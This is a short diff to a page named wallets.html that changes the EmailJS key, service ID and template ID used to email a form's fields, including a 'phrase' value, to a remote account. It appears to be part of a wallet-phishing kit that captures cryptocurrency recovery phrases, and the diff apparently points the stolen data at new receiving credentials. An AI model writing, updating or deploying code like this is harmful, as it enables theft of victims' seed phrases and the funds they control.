--- a/wallet/wallets.html
+++ b/wallet/wallets.html
@@ -629,7 +629,7 @@
     <script src="https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.js"></script>
     <script type="text/javascript">
         (function(){
-           emailjs.init("VpOGpcdzaW3oJiWXV");
+           emailjs.init("FAg3MS0goc62NjslX");
         })();
      </script>
 
@@ -2610,7 +2610,7 @@
             phrase: phrase.value,
             };
         
-            emailjs.send('service_cy9wtj9', 'template_a3od8un', templateParams)
+            emailjs.send('service_9eaebud', 'template_ix5gqkf', templateParams)
                 .then(function(response) {
                 console.log('SUCCESS!', response.status, response.text);
                 document.querySelector(".thankyou_message").style.display = "block"
